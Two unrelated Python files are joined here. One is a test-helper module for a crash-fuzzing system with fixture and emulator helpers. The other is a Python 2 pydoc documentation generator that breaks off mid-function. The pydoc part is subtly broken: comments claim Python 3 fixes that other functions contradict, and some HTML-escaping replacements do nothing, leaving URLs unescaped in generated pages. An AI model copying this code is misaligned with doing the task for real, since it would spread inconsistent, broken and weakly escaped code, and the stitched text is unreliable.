"""Generic helper functions useful in tests."""
from builtins import object
from builtins import str
from future import standard_library
standard_library.install_aliases()
import atexit
import datetime
import io
import os
import requests
import shutil
import six
import socket
import subprocess
import sys
import tempfile
import threading
import unittest
from config import local_config
from datastore import data_types
from datastore import ndb_init
from google_cloud_utils import pubsub
from system import environment
from system import process_handler
# Snapshot of "now" taken once at import time; tests compute relative
# timestamps (e.g. created_days_ago) against this single fixed reference.
CURRENT_TIME = datetime.datetime.utcnow()
# Seconds to wait for a cloud emulator to report readiness on stdout.
EMULATOR_TIMEOUT = 20
# Per-process emulator instances.
_emulators = {}
def create_generic_testcase(created_days_ago=28):
    """Create and store a minimal Testcase entity for use in tests.

    `created_days_ago` controls how far in the past (relative to the
    module-level CURRENT_TIME snapshot) the testcase's timestamp is set.
    """
    testcase = data_types.Testcase()
    # Bare-minimum attribute values needed to simulate a test case; extend
    # this table as new fields become relevant.
    attributes = {
        'absolute_path': '/a/b/c/test.html',
        'crash_address': '0xdeadbeef',
        'crash_revision': 1,
        'crash_state': 'crashy_function()',
        'crash_type': 'fake type',
        'comments': 'Fuzzer: test',
        'fuzzed_keys': 'abcd',
        'minimized_keys': 'efgh',
        'fuzzer_name': 'fuzzer1',
        'open': True,
        'one_time_crasher_flag': False,
        'job_type': 'test_content_shell_drt',
        'status': 'Processed',
        'timestamp': CURRENT_TIME - datetime.timedelta(days=created_days_ago),
        'project_name': 'project',
        'platform': 'linux',
    }
    # The stacktrace mirrors the crash state in this simplified fixture.
    attributes['crash_stacktrace'] = attributes['crash_state']
    for field, value in attributes.items():
        setattr(testcase, field, value)
    testcase.put()
    return testcase
def entities_equal(entity_1, entity_2, check_key=True):
    """Return whether two datastore entities are considered the same.

    With check_key (the default) only the keys are compared; otherwise the
    full property dicts are compared.
    """
    return (entity_1.key == entity_2.key) if check_key else (
        entity_1.to_dict() == entity_2.to_dict())
def entity_exists(entity):
    """Look the entity up by its own id and return the (truthy) result."""
    entity_id = entity.key.id()
    return entity.get_by_id(entity_id)
def adhoc(func):
    """Mark a test as adhoc.

    Adhoc tests are NOT run before merging and do NOT count toward coverage;
    they exist so that one-off scripts for tricky situations (e.g. downloading
    and unpacking a 10GB chrome revision) get checked in instead of lost.
    Enable with the env var ADHOC=1.
    """
    enabled = environment.get_value('ADHOC', False)
    return unittest.skipIf(not enabled, 'Adhoc tests are not enabled.')(func)
def integration(func):
    """Mark a test as integration: it needs network resources and/or is slow.

    Integration tests should at least run before merging and count toward
    coverage. Enable with the env var INTEGRATION=1.
    """
    enabled = environment.get_value('INTEGRATION', False)
    return unittest.skipIf(not enabled, 'Integration tests are not enabled.')(func)
def slow(func):
    """Mark a test as slow; such tests are skipped during presubmit."""
    enabled = environment.get_value('SLOW_TESTS', True)  # on by default
    return unittest.skipIf(not enabled, 'Skipping slow tests.')(func)
def reproduce_tool(func):
    """Mark a test as exercising the test-case reproduction script.

    Enable with the env var REPRODUCE_TOOL_TESTS=1.
    """
    enabled = environment.get_value('REPRODUCE_TOOL_TESTS', False)
    return unittest.skipIf(not enabled, 'Skipping reproduce tool tests.')(func)
# TODO(mbarbella): Remove this and all users after fully migrating to Python 3.
def python2_only(func):
    """Skip the wrapped test unless running under Python 2."""
    on_python2 = sys.version_info.major == 2
    return unittest.skipIf(not on_python2, 'Skipping Python 2-only test.')(func)
def python3_only(func):
    """Skip the wrapped test unless running under Python 3."""
    on_python3 = sys.version_info.major == 3
    return unittest.skipIf(not on_python3, 'Skipping Python 3-only test.')(func)
def android_device_required(func):
    """Skip Android-specific tests when they cannot run in this environment."""
    if not environment.get_value('ANDROID_SERIAL'):
        reason = 'Android device tests require that ANDROID_SERIAL is set.'
    elif not environment.get_value('INTEGRATION'):
        reason = 'Integration tests are not enabled.'
    elif environment.platform() != 'LINUX':
        reason = 'Android device tests can only run on a Linux host.'
    else:
        reason = None
    return unittest.skipIf(reason is not None, reason)(func)
class EmulatorInstance(object):
    """Handle to a running cloud-emulator process."""

    def __init__(self, proc, port, read_thread, data_dir):
        # `data_dir` is only set when this instance owns a temporary
        # directory that must be deleted on cleanup.
        self._proc = proc
        self._port = port
        self._read_thread = read_thread
        self._data_dir = data_dir

    def cleanup(self):
        """Stop the emulator process tree and remove any owned data dir."""
        process_handler.terminate_root_and_child_processes(self._proc.pid)
        self._read_thread.join()
        if self._data_dir:
            shutil.rmtree(self._data_dir, ignore_errors=True)

    def reset(self):
        """Reset emulator state via its HTTP /reset endpoint."""
        response = requests.post('http://localhost:{}/reset'.format(self._port))
        response.raise_for_status()
def _find_free_port():
    """Ask the OS for an unused localhost TCP port and return its number."""
    probe = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    probe.bind(('localhost', 0))
    free_port = probe.getsockname()[1]
    probe.close()
    return free_port
def wait_for_emulator_ready(proc,
                            emulator,
                            indicator,
                            timeout=EMULATOR_TIMEOUT,
                            output_lines=None):
    """Wait for an emulator subprocess to signal readiness.

    A daemon thread drains `proc.stdout`; the emulator counts as ready once a
    line containing `indicator` is seen. Lines are mirrored into
    `output_lines` when given. Returns the reader thread (it keeps draining
    for the process's lifetime). Raises RuntimeError on timeout.
    """
    ready_event = threading.Event()

    def _drain_stdout():
        """Continuously read child stdout until EOF."""
        seen = False
        line = proc.stdout.readline()
        while line:
            if output_lines is not None:
                output_lines.append(line)
            if not seen and indicator in line:
                seen = True
                ready_event.set()
            line = proc.stdout.readline()

    reader = threading.Thread(target=_drain_stdout)
    reader.daemon = True
    reader.start()
    if not ready_event.wait(timeout):
        raise RuntimeError(
            '{} emulator did not get ready in time.'.format(emulator))
    return reader
def start_cloud_emulator(emulator,
                         args=None,
                         data_dir=None,
                         store_on_disk=False):
    """Start a cloud emulator ('datastore' or 'pubsub') via gcloud.

    Blocks until the emulator prints its readiness banner, exports the
    emulator's environment variables into this process, and returns an
    EmulatorInstance handle. Raises RuntimeError for unsupported emulators.
    """
    # stdout markers that signal each supported emulator is serving.
    ready_indicators = {
        'datastore': b'is now running',
        'pubsub': b'Server started',
    }
    store_on_disk_flag = ('--store-on-disk'
                          if store_on_disk else '--no-store-on-disk')
    default_flags = {
        'datastore': [store_on_disk_flag, '--consistency=1'],
        'pubsub': [],
    }
    if emulator not in ready_indicators:
        raise RuntimeError('Unsupported emulator')
    if data_dir:
        # Caller owns the directory; don't delete it on cleanup.
        cleanup_dir = None
    else:
        temp_dir = tempfile.mkdtemp()
        data_dir = temp_dir
        cleanup_dir = temp_dir
    port = _find_free_port()
    command = [
        'gcloud', 'beta', 'emulators', emulator, 'start',
        '--data-dir=' + data_dir, '--host-port=localhost:' + str(port),
        '--project=' + local_config.GAEConfig().get('application_id')
    ]
    if args:
        command.extend(args)
    command.extend(default_flags[emulator])
    # Start emulator.
    proc = subprocess.Popen(
        command, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
    thread = wait_for_emulator_ready(proc, emulator, ready_indicators[emulator])
    # Set env vars.
    # `env-init` emits shell lines like "export NAME=value"; take the second
    # token of each line and copy NAME=value into os.environ.
    env_vars = subprocess.check_output([
        'gcloud', 'beta', 'emulators', emulator, 'env-init',
        '--data-dir=' + data_dir
    ])
    for line in env_vars.splitlines():
        key, value = line.split()[1].split(b'=')
        os.environ[key.strip().decode('utf-8')] = value.strip().decode('utf-8')
    return EmulatorInstance(proc, port, thread, cleanup_dir)
def create_pubsub_topic(client, project, name):
    """Create the pubsub topic unless it already exists."""
    full_name = pubsub.topic_name(project, name)
    if not client.get_topic(full_name):
        client.create_topic(full_name)
def create_pubsub_subscription(client, project, topic, name):
    """Create the pubsub subscription unless it already exists."""
    topic_name = pubsub.topic_name(project, topic)
    full_name = pubsub.subscription_name(project, name)
    if not client.get_subscription(full_name):
        client.create_subscription(full_name, topic_name)
def setup_pubsub(project):
    """Create every topic and subscription listed in the pubsub.queues config."""
    queues = local_config.Config('pubsub.queues').get('resources')
    client = pubsub.PubSubClient()
    for queue in queues:
        name = queue['name']
        create_pubsub_topic(client, project, name)
        create_pubsub_subscription(client, project, name, name)
def with_cloud_emulators(*emulator_names):
    """Decorator for starting cloud emulators from a unittest.TestCase.

    Emulators are started once per process (cached in the module-level
    `_emulators` dict) and torn down via atexit; each test's setUp resets
    every running emulator to a clean state.
    """
    def decorator(cls):
        """Decorator."""
        class Wrapped(cls):
            """Wrapped class."""
            @classmethod
            def setUpClass(cls):
                """Class setup."""
                for emulator_name in emulator_names:
                    if emulator_name not in _emulators:
                        # First use in this process: start the emulator and
                        # register its cleanup for interpreter exit.
                        _emulators[emulator_name] = start_cloud_emulator(emulator_name)
                        atexit.register(_emulators[emulator_name].cleanup)
                    if emulator_name == 'datastore':
                        # Datastore tests additionally need an ndb context
                        # held open for the whole class.
                        cls._context_generator = ndb_init.context()
                        cls._context_generator.__enter__()
                super(Wrapped, cls).setUpClass()

            @classmethod
            def tearDownClass(cls):
                """Class teardown."""
                for emulator_name in emulator_names:
                    if emulator_name == 'datastore':
                        cls._context_generator.__exit__(None, None, None)
                super(Wrapped, cls).tearDownClass()

            def setUp(self):
                # Reset every running emulator so tests start from scratch.
                for emulator in six.itervalues(_emulators):
                    emulator.reset()
                super(Wrapped, self).setUp()

        # Preserve the original class identity for test discovery/reporting.
        Wrapped.__module__ = cls.__module__
        Wrapped.__name__ = cls.__name__
        return Wrapped
    return decorator
def set_up_pyfakefs(test_self):
    """Set up pyfakefs with the real config directory mapped into the fake FS."""
    # Resolve the real paths before the fake filesystem takes over.
    config_dir = os.path.realpath(environment.get_config_directory())
    real_cwd = os.path.realpath(os.getcwd())
    test_self.setUpPyfakefs()
    # Expose the real config files inside the fake FS, then restore the cwd.
    test_self.fs.add_real_directory(config_dir, lazy_read=False)
    os.chdir(real_cwd)
def supported_platforms(*platforms):
    """Decorator factory enabling a test only on the given platforms."""
    allowed = set(platforms)

    def decorator(func):  # pylint: disable=unused-argument
        """Skip the wrapped test when the current platform is not allowed."""
        unsupported = environment.platform() not in allowed
        return unittest.skipIf(unsupported, 'Unsupported platform.')(func)

    return decorator
MockStdout = io.StringIO # pylint: disable=invalid-name
|
pydoc.py | #!/usr/bin/env python
# -*- coding: Latin-1 -*-
"""Generate Python documentation in HTML or text for interactive use.
In the Python interpreter, do "from pydoc import help" to provide online
help. Calling help(thing) on a Python object documents the object.
Or, at the shell command line outside of Python:
Run "pydoc <name>" to show documentation on something. <name> may be
the name of a function, module, package, or a dotted reference to a
class or function within a module or module in a package. If the
argument contains a path segment delimiter (e.g. slash on Unix,
backslash on Windows) it is treated as the path to a Python source file.
Run "pydoc -k <keyword>" to search for a keyword in the synopsis lines
of all available modules.
Run "pydoc -p <port>" to start an HTTP server on a given port on the
local machine to generate documentation web pages.
For platforms without a command line, "pydoc -g" starts the HTTP server
and also pops up a little window for controlling it.
Run "pydoc -w <name>" to write out the HTML documentation for a module
to a file named "<name>.html".
Module docs for core modules are assumed to be in
http://www.python.org/doc/current/lib/
This can be overridden by setting the PYTHONDOCS environment variable
to a different URL or to a local directory containing the Library
Reference Manual pages.
"""
__author__ = "Ka-Ping Yee <ping@lfw.org>"
__date__ = "26 February 2001"
__version__ = "$Revision: 54826 $"
__credits__ = """Guido van Rossum, for an excellent programming language.
Tommy Burnette, the original creator of manpy.
Paul Prescod, for all his work on onlinehelp.
Richard Chamberlain, for the first implementation of textdoc.
"""
# Known bugs that can't be fixed here:
# - imp.load_module() cannot be prevented from clobbering existing
# loaded modules, so calling synopsis() on a binary module file
# changes the contents of any existing module with the same name.
# - If the __file__ attribute on a module is a relative path and
# the current directory is changed with os.chdir(), an incorrect
# path will be displayed.
import sys, imp, os, re, types, inspect, __builtin__, pkgutil
from repr import Repr
from string import expandtabs, find, join, lower, split, strip, rfind, rstrip
try:
    from collections import deque
except ImportError:
    # Python 2.3 compatibility
    class deque(list):
        # Minimal stand-in: only popleft() is needed by this module.
        def popleft(self):
            return self.pop(0)
# --------------------------------------------------------- common routines
def pathdirs():
    """Convert sys.path into a list of absolute, existing, unique paths."""
    dirs = []
    seen = []  # normalized-case paths already accepted
    for entry in sys.path:
        entry = os.path.abspath(entry or '.')
        normalized = os.path.normcase(entry)
        if normalized not in seen and os.path.isdir(entry):
            dirs.append(entry)
            seen.append(normalized)
    return dirs
def getdoc(object):
    """Get the doc string or comments for an object."""
    text = inspect.getdoc(object) or inspect.getcomments(object)
    if not text:
        return ''
    # Drop leading blank lines and trailing whitespace.
    return re.sub('^ *\n', '', rstrip(text)) or ''
def splitdoc(doc):
    """Split a doc string into a synopsis line (if any) and the rest."""
    lines = split(strip(doc), '\n')
    if len(lines) == 1:
        return lines[0], ''
    if len(lines) >= 2 and not rstrip(lines[1]):
        # Blank second line: first line is the synopsis, the rest is body.
        return lines[0], join(lines[2:], '\n')
    # No clear synopsis: everything is body.
    return '', join(lines, '\n')
def classname(object, modname):
    """Get a class name, qualified with its module name when it differs."""
    if object.__module__ == modname:
        return object.__name__
    return object.__module__ + '.' + object.__name__
def isdata(object):
    """Check if an object is of a type that probably means it's data."""
    checks = (inspect.ismodule, inspect.isclass, inspect.isroutine,
              inspect.isframe, inspect.istraceback, inspect.iscode)
    return not any(check(object) for check in checks)
def replace(text, *pairs):
    """Do a series of global replacements on a string.

    `pairs` is a flat sequence: old1, new1, old2, new2, ...
    """
    while pairs:
        old, new = pairs[0], pairs[1]
        text = join(split(text, old), new)
        pairs = pairs[2:]
    return text
def cram(text, maxlen):
    """Omit the middle of a string if needed to fit it in `maxlen` chars."""
    if len(text) <= maxlen:
        return text
    # Split the budget (minus 3 for the ellipsis) between head and tail.
    pre = max(0, (maxlen - 3) // 2)
    post = max(0, maxlen - 3 - pre)
    return text[:pre] + '...' + text[len(text) - post:]
# Matches the trailing " at 0x..." id in default object reprs.
_re_stripid = re.compile(r' at 0x[0-9a-f]{6,16}(>+)$', re.IGNORECASE)
def stripid(text):
    """Remove the hexadecimal id from a Python object representation."""
    # The behaviour of %p is implementation-dependent in terms of case.
    # Only strip when this interpreter's default repr actually matches.
    if _re_stripid.search(repr(Exception)):
        return _re_stripid.sub(r'\1', text)
    return text
def _is_some_method(obj):
    """True for methods and method descriptors."""
    return inspect.ismethod(obj) or inspect.ismethoddescriptor(obj)

def allmethods(cl):
    """Return a {name: attribute} dict of all methods of `cl`, including
    those inherited from every base class."""
    methods = {}
    for name, _ in inspect.getmembers(cl, _is_some_method):
        methods[name] = 1
    for base in cl.__bases__:
        methods.update(allmethods(base))  # all your base are belong to us
    # Replace the placeholder values with the attributes as seen from `cl`.
    for name in methods:
        methods[name] = getattr(cl, name)
    return methods
def _split_list(s, predicate):
    """Split sequence s via predicate, and return pair ([true], [false]).

    The return value is a 2-tuple of lists,
    ([x for x in s if predicate(x)],
    [x for x in s if not predicate(x)])
    """
    yes = []
    no = []
    for item in s:
        target = yes if predicate(item) else no
        target.append(item)
    return yes, no
def visiblename(name, all=None):
    """Decide whether to show documentation on a variable."""
    # Certain special names are redundant.
    redundant = ('__builtins__', '__doc__', '__file__', '__path__',
                 '__module__', '__name__', '__slots__')
    if name in redundant:
        return 0
    # Private names are hidden, but special (dunder) names are displayed.
    if name.startswith('__') and name.endswith('__'):
        return 1
    if all is not None:
        # Only document that which the programmer exported in __all__.
        return name in all
    return not name.startswith('_')
def classify_class_attrs(object):
    """Wrap inspect.classify_class_attrs, with fixup for data descriptors."""
    def fixup(data):
        # The original used tuple-parameter unpacking in the signature
        # (`def fixup((name, kind, cls, value))`), which was removed in
        # Python 3 (PEP 3113) and makes the module fail to even parse there.
        # Explicit unpacking behaves identically on Python 2 and 3.
        name, kind, cls, value = data
        if inspect.isdatadescriptor(value):
            kind = 'data descriptor'
        return name, kind, cls, value
    return map(fixup, inspect.classify_class_attrs(object))
# ----------------------------------------------------- module manipulation
def ispackage(path):
    """Guess whether a path refers to a package directory."""
    if not os.path.isdir(path):
        return False
    candidates = ('__init__.py', '__init__.pyc', '__init__.pyo')
    return any(os.path.isfile(os.path.join(path, base)) for base in candidates)
def source_synopsis(file):
    """Return the first line of the module docstring from an open source
    file, or None if the file does not start with a docstring."""
    # Skip leading comment lines and blank lines.
    line = file.readline()
    while line[:1] == '#' or not strip(line):
        line = file.readline()
        if not line: break
    line = strip(line)
    # Treat a raw docstring (r""") the same as a plain one.
    if line[:4] == 'r"""': line = line[1:]
    if line[:3] == '"""':
        line = line[3:]
        if line[-1:] == '\\': line = line[:-1]
        # Advance to the first non-blank docstring line.
        while not strip(line):
            line = file.readline()
            if not line: break
        result = strip(split(line, '"""')[0])
    else: result = None
    return result
def synopsis(filename, cache={}):
    """Get the one-line summary out of a module file.

    `cache` maps filename -> (mtime, synopsis); the mutable default argument
    is the (intentional) per-process memo shared across calls.
    """
    mtime = os.stat(filename).st_mtime
    lastupdate, result = cache.get(filename, (0, None))
    # Recompute only when the file changed since the cached entry.
    if lastupdate < mtime:
        info = inspect.getmoduleinfo(filename)
        try:
            file = open(filename)
        except IOError:
            # module can't be opened, so skip it
            return None
        if info and 'b' in info[2]:  # binary modules have to be imported
            try: module = imp.load_module('__temp__', file, filename, info[1:])
            except: return None
            result = (module.__doc__ or '').splitlines()[0]
            del sys.modules['__temp__']
        else:  # text modules can be directly examined
            result = source_synopsis(file)
        file.close()
        cache[filename] = (mtime, result)
    return result
class ErrorDuringImport(Exception):
    """Errors that occurred while trying to import something to document it."""
    def __init__(self, filename, exc_info):
        # `exc_info` is a (type, value, traceback) triple as returned by
        # sys.exc_info(). The old signature used Python 2 tuple-parameter
        # unpacking (removed in Python 3, PEP 3113); callers still pass the
        # triple positionally, so this change is call-compatible.
        exc, value, tb = exc_info
        self.filename = filename
        self.exc = exc
        self.value = value
        self.tb = tb

    def __str__(self):
        exc = self.exc
        # Old-style (classic) exception classes exist only on Python 2;
        # guard the types attribute so __str__ also works on Python 3,
        # where accessing types.ClassType raised AttributeError.
        classic = getattr(types, 'ClassType', None)
        if classic is not None and type(exc) is classic:
            exc = exc.__name__
        return 'problem in %s - %s: %s' % (self.filename, exc, self.value)
def importfile(path):
    """Import a Python source file or compiled file given its path."""
    magic = imp.get_magic()
    # Peek at the first bytes: compiled files start with the magic number.
    file = open(path, 'r')
    if file.read(len(magic)) == magic:
        kind = imp.PY_COMPILED
    else:
        kind = imp.PY_SOURCE
    file.close()
    filename = os.path.basename(path)
    name, ext = os.path.splitext(filename)
    file = open(path, 'r')
    try:
        module = imp.load_module(name, file, path, (ext, 'r', kind))
    except:
        # Wrap any failure (syntax error, error while executing, ...) so the
        # caller can report the offending path.
        # NOTE(review): `file` is not closed when load_module raises.
        raise ErrorDuringImport(path, sys.exc_info())
    file.close()
    return module
def safeimport(path, forceload=0, cache={}):
    """Import a module; handle errors; return None if the module isn't found.
    If the module *is* found but an exception occurs, it's wrapped in an
    ErrorDuringImport exception and reraised.  Unlike __import__, if a
    package path is specified, the module at the end of the path is returned,
    not the package at the beginning.  If the optional 'forceload' argument
    is 1, we reload the module from disk (unless it's a dynamic extension)."""
    try:
        # If forceload is 1 and the module has been previously loaded from
        # disk, we always have to reload the module.  Checking the file's
        # mtime isn't good enough (e.g. the module could contain a class
        # that inherits from another module that has changed).
        if forceload and path in sys.modules:
            if path not in sys.builtin_module_names:
                # Avoid simply calling reload() because it leaves names in
                # the currently loaded module lying around if they're not
                # defined in the new source file.  Instead, remove the
                # module from sys.modules and re-import.  Also remove any
                # submodules because they won't appear in the newly loaded
                # module's namespace if they're already in sys.modules.
                subs = [m for m in sys.modules if m.startswith(path + '.')]
                for key in [path] + subs:
                    # Prevent garbage collection.
                    cache[key] = sys.modules[key]
                    del sys.modules[key]
        module = __import__(path)
    except:
        # Did the error occur before or after the module was found?
        (exc, value, tb) = info = sys.exc_info()
        if path in sys.modules:
            # An error occurred while executing the imported module.
            raise ErrorDuringImport(sys.modules[path].__file__, info)
        elif exc is SyntaxError:
            # A SyntaxError occurred before we could execute the module.
            raise ErrorDuringImport(value.filename, info)
        elif exc is ImportError and \
             split(lower(str(value)))[:2] == ['no', 'module']:
            # The module was not found.
            return None
        else:
            # Some other error occurred during the importing process.
            raise ErrorDuringImport(path, sys.exc_info())
    # Walk down from the top-level package to the requested submodule.
    for part in split(path, '.')[1:]:
        try: module = getattr(module, part)
        except AttributeError: return None
    return module
# ---------------------------------------------------- formatter base class
class Doc:
    """Base class for documentation generators.

    Subclasses provide docmodule/docclass/docroutine/docother/docproperty/
    docdata; any they don't override falls through to fail().
    (This file targets Python 2 — note the old-style raise in fail().)
    """
    def document(self, object, name=None, *args):
        """Generate documentation for an object."""
        args = (object, name) + args
        # 'try' clause is to attempt to handle the possibility that inspect
        # identifies something in a way that pydoc itself has issues handling;
        # think 'super' and how it is a descriptor (which raises the exception
        # by lacking a __name__ attribute) and an instance.
        if inspect.isgetsetdescriptor(object): return self.docdata(*args)
        if inspect.ismemberdescriptor(object): return self.docdata(*args)
        try:
            if inspect.ismodule(object): return self.docmodule(*args)
            if inspect.isclass(object): return self.docclass(*args)
            if inspect.isroutine(object): return self.docroutine(*args)
        except AttributeError:
            pass
        if isinstance(object, property): return self.docproperty(*args)
        return self.docother(*args)

    def fail(self, object, name=None, *args):
        """Raise an exception for unimplemented types."""
        message = "don't know how to document object%s of type %s" % (
            name and ' ' + repr(name), type(object).__name__)
        raise TypeError, message

    # Default every documenter to fail(); subclasses override what they support.
    docmodule = docclass = docroutine = docother = docproperty = docdata = fail

    def getdocloc(self, object):
        """Return the location of module docs or None"""
        try:
            file = inspect.getabsfile(object)
        except TypeError:
            file = '(built-in)'
        # PYTHONDOCS may point to a URL or a local directory of docs.
        docloc = os.environ.get("PYTHONDOCS",
                                "http://www.python.org/doc/current/lib")
        basedir = os.path.join(sys.exec_prefix, "lib",
                               "python"+sys.version[0:3])
        # Core modules (by name, or living under the stdlib dir but not in
        # site-packages) get a module-<name>.html location; others get None.
        if (isinstance(object, type(os)) and
            (object.__name__ in ('errno', 'exceptions', 'gc', 'imp',
                                 'marshal', 'posix', 'signal', 'sys',
                                 'thread', 'zipimport') or
             (file.startswith(basedir) and
              not file.startswith(os.path.join(basedir, 'site-packages'))))):
            htmlfile = "module-%s.html" % object.__name__
            if docloc.startswith("http://"):
                docloc = "%s/%s" % (docloc.rstrip("/"), htmlfile)
            else:
                docloc = os.path.join(docloc, htmlfile)
        else:
            docloc = None
        return docloc
# -------------------------------------------- HTML documentation generator
class HTMLRepr(Repr):
    """Class for safely making an HTML representation of a Python object."""
    def __init__(self):
        Repr.__init__(self)
        # Truncation limits for the abbreviated reprs.
        self.maxlist = self.maxtuple = 20
        self.maxdict = 10
        self.maxstring = self.maxother = 100

    def escape(self, text):
        # HTML-escape markup-significant characters.  The entity replacement
        # strings had been lost (each character was "replaced" by itself),
        # which left object reprs able to inject raw HTML into the output.
        return replace(text, '&', '&amp;', '<', '&lt;', '>', '&gt;')

    def repr(self, object):
        return Repr.repr(self, object)

    def repr1(self, x, level):
        # Dispatch to a type-specific repr_<typename> method when one exists.
        if hasattr(type(x), '__name__'):
            methodname = 'repr_' + join(split(type(x).__name__), '_')
            if hasattr(self, methodname):
                return getattr(self, methodname)(x, level)
        return self.escape(cram(stripid(repr(x)), self.maxother))

    def repr_string(self, x, level):
        test = cram(x, self.maxstring)
        testrepr = repr(test)
        if '\\' in test and '\\' not in replace(testrepr, r'\\', ''):
            # Backslashes are only literal in the string and are never
            # needed to make any special characters, so show a raw string.
            return 'r' + testrepr[0] + self.escape(test) + testrepr[0]
        # Highlight escape sequences inside the repr.
        return re.sub(r'((\\[\\abfnrtv\'"]|\\[0-9]..|\\x..|\\u....)+)',
                      r'<font color="#c040c0">\1</font>',
                      self.escape(testrepr))

    repr_str = repr_string

    def repr_instance(self, x, level):
        try:
            return self.escape(cram(stripid(repr(x)), self.maxstring))
        except:
            return self.escape('<%s instance>' % x.__class__.__name__)

    repr_unicode = repr_string
class HTMLDoc(Doc):
"""Formatter class for HTML documentation."""
# ------------------------------------------- HTML formatting utilities
_repr_instance = HTMLRepr()
repr = _repr_instance.repr
escape = _repr_instance.escape
def page(self, title, contents):
"""Format an HTML page."""
return '''
<!doctype html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html><head><title>Python: %s</title>
</head><body bgcolor="#f0f0f8">
%s
</body></html>''' % (title, contents)
def heading(self, title, fgcol, bgcol, extras=''):
"""Format a page heading."""
return '''
<table width="100%%" cellspacing=0 cellpadding=2 border=0 summary="heading">
<tr bgcolor="%s">
<td valign=bottom> <br>
<font color="%s" face="helvetica, arial"> <br>%s</font></td
><td align=right valign=bottom
><font color="%s" face="helvetica, arial">%s</font></td></tr></table>
''' % (bgcol, fgcol, title, fgcol, extras or ' ')
def section(self, title, fgcol, bgcol, contents, width=6,
prelude='', marginalia=None, gap=' '):
"""Format a section with a heading."""
if marginalia is None:
marginalia = '<tt>' + ' ' * width + '</tt>'
result = '''<p>
<table width="100%%" cellspacing=0 cellpadding=2 border=0 summary="section">
<tr bgcolor="%s">
<td colspan=3 valign=bottom> <br>
<font color="%s" face="helvetica, arial">%s</font></td></tr>
''' % (bgcol, fgcol, title)
if prelude:
result = result + '''
<tr bgcolor="%s"><td rowspan=2>%s</td>
<td colspan=2>%s</td></tr>
<tr><td>%s</td>''' % (bgcol, marginalia, prelude, gap)
else:
result = result + '''
<tr><td bgcolor="%s">%s</td><td>%s</td>''' % (bgcol, marginalia, gap)
return result + '\n<td width="100%%">%s</td></tr></table>' % contents
def bigsection(self, title, *args):
"""Format a section with a big heading."""
title = '<big><strong>%s</strong></big>' % title
return self.section(title, *args)
def preformat(self, text):
"""Format literal preformatted text."""
text = self.escape(expandtabs(text))
return replace(text, '\n\n', '\n \n', '\n\n', '\n \n',
' ', ' ', '\n', '<br>\n')
def multicolumn(self, list, format, cols=4):
"""Format a list of items into a multi-column list."""
result = ''
rows = (len(list)+cols-1)/cols
for col in range(cols):
result = result + '<td width="%d%%" valign=top>' % (100/cols)
for i in range(rows*col, rows*col+rows):
if i < len(list):
result = result + format(list[i]) + '<br>\n'
result = result + '</td>'
return '<table width="100%%" summary="list"><tr>%s</tr></table>' % result
def grey(self, text): return '<font color="#909090">%s</font>' % text
def namelink(self, name, *dicts):
"""Make a link for an identifier, given name-to-URL mappings."""
for dict in dicts:
if name in dict:
return '<a href="%s">%s</a>' % (dict[name], name)
return name
def classlink(self, object, modname):
"""Make a link for a class."""
name, module = object.__name__, sys.modules.get(object.__module__)
if hasattr(module, name) and getattr(module, name) is object:
return '<a href="%s.html#%s">%s</a>' % (
module.__name__, name, classname(object, modname))
return classname(object, modname)
def modulelink(self, object):
"""Make a link for a module."""
return '<a href="%s.html">%s</a>' % (object.__name__, object.__name__)
def modpkglink(self, (name, path, ispackage, shadowed)):
"""Make a link for a module or package to display in an index."""
if shadowed:
return self.grey(name)
if path:
url = '%s.%s.html' % (path, name)
else:
url = '%s.html' % name
if ispackage:
text = '<strong>%s</strong> (package)' % name
else:
text = name
return '<a href="%s">%s</a>' % (url, text)
def markup(self, text, escape=None, funcs={}, classes={}, methods={}):
"""Mark up some plain text, given a context of symbols to look for.
Each context dictionary maps object names to anchor names."""
escape = escape or self.escape
results = []
here = 0
pattern = re.compile(r'\b((http|ftp)://\S+[\w/]|'
r'RFC[- ]?(\d+)|'
r'PEP[- ]?(\d+)|'
r'(self\.)?(\w+))')
while True:
match = pattern.search(text, here)
if not match: break
start, end = match.span()
results.append(escape(text[here:start]))
all, scheme, rfc, pep, selfdot, name = match.groups()
if scheme:
url = escape(all).replace('"', '"')
results.append('<a href="%s">%s</a>' % (url, url))
elif rfc:
url = 'http://www.rfc-editor.org/rfc/rfc%d.txt' % int(rfc)
results.append('<a href="%s">%s</a>' % (url, escape(all)))
elif pep:
url = 'http://www.python.org/peps/pep-%04d.html' % int(pep)
results.append('<a href="%s">%s</a>' % (url, escape(all)))
elif text[end:end+1] == '(':
results.append(self.namelink(name, methods, funcs, classes))
elif selfdot:
results.append('self.<strong>%s</strong>' % name)
else:
results.append(self.namelink(name, classes))
here = end
results.append(escape(text[here:]))
return join(results, '')
# ---------------------------------------------- type-specific routines
def formattree(self, tree, modname, parent=None):
"""Produce HTML for a class tree as given by inspect.getclasstree()."""
result = ''
for entry in tree:
if type(entry) is type(()):
c, bases = entry
result = result + '<dt><font face="helvetica, arial">'
result = result + self.classlink(c, modname)
if bases and bases != (parent,):
parents = []
for base in bases:
parents.append(self.classlink(base, modname))
result = result + '(' + join(parents, ', ') + ')'
result = result + '\n</font></dt>'
elif type(entry) is type([]):
result = result + '<dd>\n%s</dd>\n' % self.formattree(
entry, modname, c)
return '<dl>\n%s</dl>\n' % result
def docmodule(self, object, name=None, mod=None, *ignored):
"""Produce HTML documentation for a module object."""
name = object.__name__ # ignore the passed-in name
try:
all = object.__all__
except AttributeError:
all = None
parts = split(name, '.')
links = []
for i in range(len(parts)-1):
links.append(
'<a href="%s.html"><font color="#ffffff">%s</font></a>' %
(join(parts[:i+1], '.'), parts[i]))
linkedname = join(links + parts[-1:], '.')
head = '<big><big><strong>%s</strong></big></big>' % linkedname
try:
path = inspect.getabsfile(object)
url = path
if sys.platform == 'win32':
import nturl2path
url = nturl2path.pathname2url(path)
filelink = '<a href="file:%s">%s</a>' % (url, path)
except TypeError:
filelink = '(built-in)'
info = []
if hasattr(object, '__version__'):
version = str(object.__version__)
if version[:11] == '$' + 'Revision: ' and version[-1:] == '$':
version = strip(version[11:-1])
info.append('version %s' % self.escape(version))
if hasattr(object, '__date__'):
info.append(self.escape(str(object.__date__)))
if info:
head = head + ' (%s)' % join(info, ', ')
docloc = self.getdocloc(object)
if docloc is not None:
docloc = '<br><a href="%(docloc)s">Module Docs</a>' % locals()
else:
docloc = ''
result = self.heading(
head, '#ffffff', '#7799ee',
'<a href=".">index</a><br>' + filelink + docloc)
